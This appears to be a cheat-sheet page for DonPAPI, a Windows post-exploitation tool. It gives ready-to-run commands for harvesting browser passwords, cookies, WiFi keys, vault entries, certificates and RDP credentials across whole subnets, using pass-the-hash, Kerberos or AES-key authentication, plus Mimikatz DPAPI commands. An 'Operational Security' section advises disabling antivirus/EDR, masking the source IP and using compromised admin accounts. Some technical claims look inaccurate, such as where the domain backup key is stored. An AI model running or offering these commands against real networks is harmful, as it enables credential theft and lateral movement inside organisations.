DonPAPI
DonPAPI is a post-exploitation framework for remotely harvesting Windows credentials and secrets via DPAPI without touching LSASS. It extracts browser passwords, WiFi keys, vault credentials, and certificates from target machines over the network.
Installation
Abschnitt betitelt „Installation“Install from PyPI:
pip install donpapiInstall from source:
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
pip install -r requirements.txt
python donpapi.py --helpRequires Python 3.8+, Impacket, and Windows domain credentials for remote access.
Quick Start
Abschnitt betitelt „Quick Start“Basic usage with password authentication:
donpapi -d DOMAIN -u USERNAME -p PASSWORD 192.168.1.100Single IP with domain admin account:
donpapi -d contoso.com -u admin -p 'P@ssw0rd!' 10.0.0.50Against multiple targets:
donpapi -d domain.com -u user -p pass 10.0.0.0/24Authentication Methods
Abschnitt betitelt „Authentication Methods“Password Authentication
Abschnitt betitelt „Password Authentication“donpapi -d DOMAIN -u USERNAME -p PASSWORD TARGET
donpapi -d corp -u jdoe -p 'MyPassword123!' 192.168.1.100NTLM Hash (Pass-the-Hash)
Abschnitt betitelt „NTLM Hash (Pass-the-Hash)“donpapi -d DOMAIN -u USERNAME -H NTHASH TARGET
donpapi -d corp -u admin -H 8846f7eaee8fb117ad06bdd830b7586c 10.0.0.50Kerberos Authentication
Abschnitt betitelt „Kerberos Authentication“donpapi -d DOMAIN -u USERNAME -k TARGET
export KRB5CCNAME=/tmp/user.ccache
donpapi -d corp -u jdoe -k 192.168.1.100AES Key Authentication
Abschnitt betitelt „AES Key Authentication“donpapi -d DOMAIN -u USERNAME -aesKey AESKEY TARGET
donpapi -d corp -u user -aesKey abc123def456... 10.0.0.100Current Session (LUID/Session Token)
Abschnitt betitelt „Current Session (LUID/Session Token)“donpapi -luid TOKEN TARGET
donpapi -luid 0x12345:0x6789abc 192.168.1.100Target Specification
Abschnitt betitelt „Target Specification“Single IP Address
Abschnitt betitelt „Single IP Address“donpapi -d domain.com -u admin -p pass 192.168.1.100CIDR Range
Abschnitt betitelt „CIDR Range“donpapi -d domain.com -u admin -p pass 192.168.1.0/24
donpapi -d domain.com -u admin -p pass 10.0.0.0/16Targets from File
Abschnitt betitelt „Targets from File“donpapi -d domain.com -u admin -p pass -tf targets.txttargets.txt format (one per line):
192.168.1.100
192.168.1.101
192.168.1.102
10.0.0.50Target IP Override
Abschnitt betitelt „Target IP Override“donpapi -d domain.com -u admin -p pass --target-ip 192.168.1.100 hostnameWhat It Collects
Abschnitt betitelt „What It Collects“Browser Credentials
Abschnitt betitelt „Browser Credentials“Extracts cached passwords and stored credentials from:
# Chrome/Chromium passwords and saved autofill
# Microsoft Edge passwords and autofill
# Firefox passwords (if encrypted with DPAPI)
# Opera, Brave, and other Chromium-based browsers| Browser | Passwords | Cookies | Autofill | Bookmarks |
|---|---|---|---|---|
| Chrome | Yes | Yes | Yes | No |
| Edge | Yes | Yes | Yes | No |
| Firefox | Yes | No | No | No |
| Opera | Yes | Yes | Yes | No |
| Brave | Yes | Yes | Yes | No |
WiFi Passwords
Abschnitt betitelt „WiFi Passwords“Recovers stored wireless network credentials:
# All SSID names and pre-shared keys (PSK)
# Connection profiles with DPAPI encryption
# Requires domain backup key for decryptionWindows Vault Credentials
Abschnitt betitelt „Windows Vault Credentials“Extracts stored credentials from Windows Credential Manager:
# Generic credentials (username/password pairs)
# Domain credentials
# Certificate-based credentials
# Session cookiesCertificate Data
Abschnitt betitelt „Certificate Data“Harvests certificate-related secrets:
# Private keys
# Client certificates
# Server certificates
# Certificate thumbprintsRDP Connection History
Abschnitt betitelt „RDP Connection History“Retrieves Remote Desktop credentials:
# Saved RDP connection passwords
# Connection metadata
# Server informationScheduled Task Credentials
Abschnitt betitelt „Scheduled Task Credentials“Extracts credentials from scheduled tasks:
# Task-embedded usernames and passwords
# Run-as credentials
# Service account detailsCollection Methods
Abschnitt betitelt „Collection Methods“Registry Access Over SMB
Abschnitt betitelt „Registry Access Over SMB“# HKEY_CURRENT_USER registry hives remotely
# HKEY_LOCAL_MACHINE sensitive locations
# No local execution required
# SAM/SECURITY/SYSTEM hives for hash extractionProtected File Retrieval
Abschnitt betitelt „Protected File Retrieval“# Copies protected files via SMB
# Browser database files
# Vault credential stores
# DPAPI protected filesStealthy vs. Mimikatz
Abschnitt betitelt „Stealthy vs. Mimikatz“DonPAPI advantages over Mimikatz:
# No LSASS memory access required
# No code injection needed
# No process creation on target
# Remote execution only
# No antivirus hooks on LSASS
# Recoverable from disk artifacts
# Minimal memory footprintOutput and Reporting
Abschnitt betitelt „Output and Reporting“Specify Output Directory
Abschnitt betitelt „Specify Output Directory“donpapi -d domain.com -u admin -p pass -o /tmp/output 192.168.1.100Output Structure
Abschnitt betitelt „Output Structure“output/
├── 192.168.1.100/
│ ├── Browser Credentials/
│ │ ├── chrome_passwords.txt
│ │ ├── edge_passwords.txt
│ │ └── firefox_logins.json
│ ├── Wifi/
│ │ └── wifi_passwords.txt
│ ├── Windows Vault/
│ │ └── vault_credentials.txt
│ ├── Windows Certificates/
│ │ └── certificates.pem
│ ├── RDP/
│ │ └── rdp_credentials.txt
│ └── report.htmlHTML Report
Abschnitt betitelt „HTML Report“Automatically generated summary:
# Visual dashboard of recovered credentials
# Target overview and collection summary
# Credentials grouped by type
# Timeline of collection
# Export-ready formatsDatabase Export
Abschnitt betitelt „Database Export“# SQLite database with all findings
# Searchable credential repository
# Machine-readable format
# Integration with credential managersFiltering Options
Abschnitt betitelt „Filtering Options“Exclude Browser Credentials
Abschnitt betitelt „Exclude Browser Credentials“donpapi -d domain.com -u admin -p pass --no-browser 192.168.1.100Exclude VNC Credentials
Abschnitt betitelt „Exclude VNC Credentials“donpapi -d domain.com -u admin -p pass --no-vnc 192.168.1.100Exclude WiFi Passwords
Abschnitt betitelt „Exclude WiFi Passwords“donpapi -d domain.com -u admin -p pass --no-wifi 192.168.1.100Exclude Sysadmin Accounts
Abschnitt betitelt „Exclude Sysadmin Accounts“donpapi -d domain.com -u admin -p pass --no-sysadmins 192.168.1.100Selective Collection
Abschnitt betitelt „Selective Collection“donpapi -d domain.com -u admin -p pass --filter browsers,wifi,vault 192.168.1.100
donpapi -d domain.com -u admin -p pass --filter certificates,rdp 192.168.1.100Combined Filtering
Abschnitt betitelt „Combined Filtering“donpapi -d domain.com -u admin -p pass --no-browser --no-vnc --filter vault,wifi 10.0.0.0/24DPAPI Explained
Abschnitt betitelt „DPAPI Explained“Windows DPAPI Overview
Abschnitt betitelt „Windows DPAPI Overview“DPAPI (Data Protection API) is Windows’ built-in encryption mechanism:
# User-level keys: encrypted with user password
# Machine-level keys: encrypted with SYSTEM
# Domain backup key: allows domain admin decryption
# Master keys stored in user's profileDPAPI Master Keys
Abschnitt betitelt „DPAPI Master Keys“Location and structure:
# User keys: C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect\{SID}
# System keys: C:\Windows\System32\Microsoft\Protect\S-1-5-18
# Multiple master keys per user (created periodically)
# Protected by user's logon passwordDomain Backup Key Recovery
Abschnitt betitelt „Domain Backup Key Recovery“# Domain admins can extract domain backup key
# Allows decryption of all domain user DPAPI secrets
# Stored in AD (msDS-KeyCredentialLink, etc.)
# Enables offline credential recoveryAdvanced Options
Abschnitt betitelt „Advanced Options“Provide Domain Backup Key
Abschnitt betitelt „Provide Domain Backup Key“donpapi -d domain.com -u admin -p pass --pvk domain_backup.pvk 192.168.1.100Specify Domain Controller IP
Abschnitt betitelt „Specify Domain Controller IP“donpapi -d domain.com -u admin -p pass --dc-ip 10.0.0.10 192.168.1.100Custom Target IP
Abschnitt betitelt „Custom Target IP“donpapi -d domain.com -u admin -p pass --target-ip 10.0.0.100 WORKSTATION01Port Specification
Abschnitt betitelt „Port Specification“donpapi -d domain.com -u admin -p pass -ports 445,3389 192.168.1.100
donpapi -d domain.com -u admin -p pass --port 445 192.168.1.0/24Multithreaded Collection
Abschnitt betitelt „Multithreaded Collection“donpapi -d domain.com -u admin -p pass --threads 10 192.168.1.0/24Verbose Logging
Abschnitt betitelt „Verbose Logging“donpapi -d domain.com -u admin -p pass -v 192.168.1.100
donpapi -d domain.com -u admin -p pass -vv 192.168.1.100Troubleshooting
Abschnitt betitelt „Troubleshooting“Connection Refused
Abschnitt betitelt „Connection Refused“Check network connectivity and firewall:
# Verify SMB port 445 is open
# Confirm credentials are valid
# Check firewall rules on target
# Ensure target is reachableAccess Denied
Abschnitt betitelt „Access Denied“Verify authentication credentials:
# Confirm username and password
# Check user has administrative rights
# Verify domain name is correct
# Test with different credential type (hash vs. password)No Credentials Found
Abschnitt betitelt „No Credentials Found“Target may have limited secrets stored:
# User may not have browser passwords saved
# WiFi passwords only stored for currently connected network
# Check --no-* filters aren't excluding data
# Verify user has logged in and cached credentialsDPAPI Decryption Fails
Abschnitt betitelt „DPAPI Decryption Fails“Cannot decrypt without proper keys:
# Domain backup key not available
# User password not correct
# DPAPI masterkey file corrupted
# Try with domain admin account for better accessSMB Enumeration Timeout
Abschnitt betitelt „SMB Enumeration Timeout“Increase timeout for slow networks:
donpapi -d domain.com -u admin -p pass --timeout 30 192.168.1.100Best Practices
Abschnitt betitelt „Best Practices“Operational Security
Abschnitt betitelt „Operational Security“# Use domain admin or compromised admin account
# Filter unnecessary data collections (--no-browser if not needed)
# Disable antivirus/EDR temporarily if possible
# Run against specific targets, not blind scans
# Clean up output files after collection
# Use VPN/proxy to mask source IPCollection Strategy
Abschnitt betitelt „Collection Strategy“# Target high-value systems first (servers, admin workstations)
# Prioritize domain controllers for backup key extraction
# Focus on service accounts with stored credentials
# Combine with credential validation tools
# Document all collected credentials safelyCredential Validation
Abschnitt betitelt „Credential Validation“After collection, validate credentials:
# Test RDP credentials against target
# Verify domain account access
# Check WiFi connectivity
# Authenticate to discovered systems
# Prioritize credentials by privilege levelSafe Storage
Abschnitt betitelt „Safe Storage“Protect harvested credentials:
# Store output directory on encrypted volume
# Restrict access to findings
# Use separate reporting machine
# Archive securely for cleanup
# Document chain of custodyRelated Tools
Abschnitt betitelt „Related Tools“Mimikatz DPAPI Modules
Abschnitt betitelt „Mimikatz DPAPI Modules“Extract DPAPI secrets with Mimikatz:
mimikatz.exe "dpapi::cred /in:C:\Users\user\AppData\Roaming\..."
mimikatz.exe "dpapi::masterkey /in:masterkey_file"
mimikatz.exe "dpapi::cache" # List cached DPAPI dataSharpDPAPI
Abschnitt betitelt „SharpDPAPI“C# DPAPI extraction tool:
# Windows-native DPAPI exploitation
# Chromium-based browser password extraction
# Vault credential recovery
# RDP connection harvestingImpacket dpapi.py
Abschnitt betitelt „Impacket dpapi.py“Python DPAPI utilities:
# Masterkey file parsing
# DPAPI secret decryption
# Domain backup key operations
# Cryptographic key extractionLaZagne
Abschnitt betitelt „LaZagne“Multi-platform credential recovery:
# Browser password extraction
# VPN credential harvesting
# Mail client password recovery
# SSH key enumerationOther Credential Tools
Abschnitt betitelt „Other Credential Tools“| Tool | Purpose | Stealth |
|---|---|---|
| Mimikatz | In-memory credential dumping | Low |
| procdump + pypykatz | Indirect LSASS dumping | Medium |
| Nirsoft tools | Cached credential recovery | Medium |
| SafetyKatz | Obfuscated Mimikatz variant | Medium |
| Credentials.ps1 | PowerShell credential module | High |